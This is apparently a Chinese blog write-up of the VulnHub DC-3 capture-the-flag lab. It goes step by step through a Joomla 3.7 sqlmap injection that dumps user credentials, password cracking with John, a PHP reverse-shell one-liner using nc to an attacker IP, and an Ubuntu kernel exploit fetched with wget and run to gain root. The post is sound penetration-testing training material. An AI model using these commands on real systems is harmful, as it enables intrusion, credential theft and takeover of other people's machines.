渗透测试学习之靶机DC-3

最新推荐文章于 2024-05-20 02:07:36 发布
最新推荐文章于 2024-05-20 02:07:36 发布
阅读量537 收藏 3
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/104779201
版权
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.140
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.140
    在这里插入图片描述
  • web站点的相关服务信息
    在这里插入图片描述
    在这里插入图片描述
3. joomscan扫描站点

从站点信息得到使用joomal,使用joomscan获取信息:
perl joomscan.pl -u http://192.168.246.140
在这里插入图片描述

4. 利用版本漏洞

查找joomla 3.7的相关漏洞信息:
searchsploit joomla 3.7
在这里插入图片描述
查看3.7.0的sql注入相关用法信息:
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
在这里插入图片描述
修改localhost为目标主机IP,获取数据库payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
在这里插入图片描述
获取joomladb中的表payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
在这里插入图片描述
可以看到users表。
获取users表中字段名payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
在这里插入图片描述
获取表中name,password,username信息payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]
在这里插入图片描述
使用John the Ripper破解一下:
./john /root/Desktop/dc3.txt
在这里插入图片描述

5. 获取shell

登录后,扩展模板下的Beez3下,可以修改php文件:
在这里插入图片描述
在这里插入图片描述
在modules.php中插入反弹shell的php脚本:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.246.138 8888 >/tmp/f'); ?>
在这里插入图片描述
保存后在138中开启监听,然后访问该php文件:
http://192.168.246.140/templates/beez3/html/modules.php
在这里插入图片描述

6. 提权

参考链接
查看Ubuntu版本信息:
lsb_release -a
在这里插入图片描述
查找主机系统版本提权漏洞:
searchsploit ubuntu 16.04
在这里插入图片描述
参考大佬文章使用:
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
给了poc和exp的链接,下载exp:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
在这里插入图片描述
提取39772.zip文件:
unzip 39772.zip
在这里插入图片描述
解压exploit.tar并运行:
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit:解压完tar后进入解压后的目录
./compile.sh
./doubleput
在这里插入图片描述
拿到root权限,进入根目录,得到the-flag.txt。
在这里插入图片描述

总结
wxlblh
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【技术分享】实战dc-3靶场及其技巧讲解
军火库
07-22 295
本期技术文章将与大家分享小星实战“dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
DC-3靶场实战详解
a310034188的博客
01-26 9476
环境安装 前面安装了老版本的DC-3几次,nmap都扫描不到机器,后来琢磨了很久也找不到问题,然后我去官网重新下载了个就没问题了 官网地址:https://www.vulnhub.com/entry/dc-32,312/ KALI和DC-3都用NAT模式. DC-3需要多修改一些东西 把IDE里面的改成IDE 0:0 都完成后开启KALI与DC-3 寻找FLAG 信息收集 1.首先确认kali与DC-3所在网段 ip add 确认kali与DC-3所在网段为192.168.79.0/2
vulnhub靶场之DC-3
qq_58091216的博客
01-08 1229
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
vulnhub靶场实战系列-DC-3实战
最新发布
weixin_45221204的博客
05-20 980
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-3靶机渗透测试,内容包括nmap扫描、Joomla SQL 注入、john密码破解、linux内核提权等内容。使用nmap进行主机发现和端口扫描使用joomscan目录扫描使用sqlmp进行sql注入获得用户信息使用john进行密码爆破登录管理页面上传shell脚本linux内核提权,并获得flag。
DC-3靶场渗透】
一纸荒芜的博客
12-12 3418
DC3靶场打靶记录!
DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-27 5272
DC-3靶场渗透过程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
靶机DC-3—WP
m0_66638011的博客
05-17 1279
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试
DC系列漏洞靶场-渗透测试学习复现(DC-3)
W983079520的博客
12-02 1303
DC-3是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了linux内核漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-3靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口只有一个: 80(http默认端口)。 4 访问web 访问we
DC3靶场渗透流程(超详细)
m0_64583632的博客
04-04 1184
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
DC3靶场通过详细记录】
博客
12-16 1218
DC3靶场通关记录-----sqlmap的使用:sql注入john爆破密码:对加密的密码进行解密msf的使用:生成反弹shell的木马和进行反弹shell监听linux内核漏洞检测脚本:linux-exploit-suggester.sh,可以直接在github下载,下载链接。
靶机4 DC-3(过程超详细)
honest_gg的博客
09-26 1030
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
vulnhub通关-3 DC-3(含靶场资源)
Brucye
02-07 938
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)链接:https://pan.baidu.com/s/1tJr7V5ZbYMtfCLeOa40r2Q。建议不要使用https源,https更换源需要处理安全问题较为麻烦,我这里直接使用的http源。注意:doublepu.c执行后会生成doublepu 要再次执行doublepu。这款工具是专门对Joomla框架进行扫描的,需要进行下载。3.接下来选择你想导入的路径,进行导入即可。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值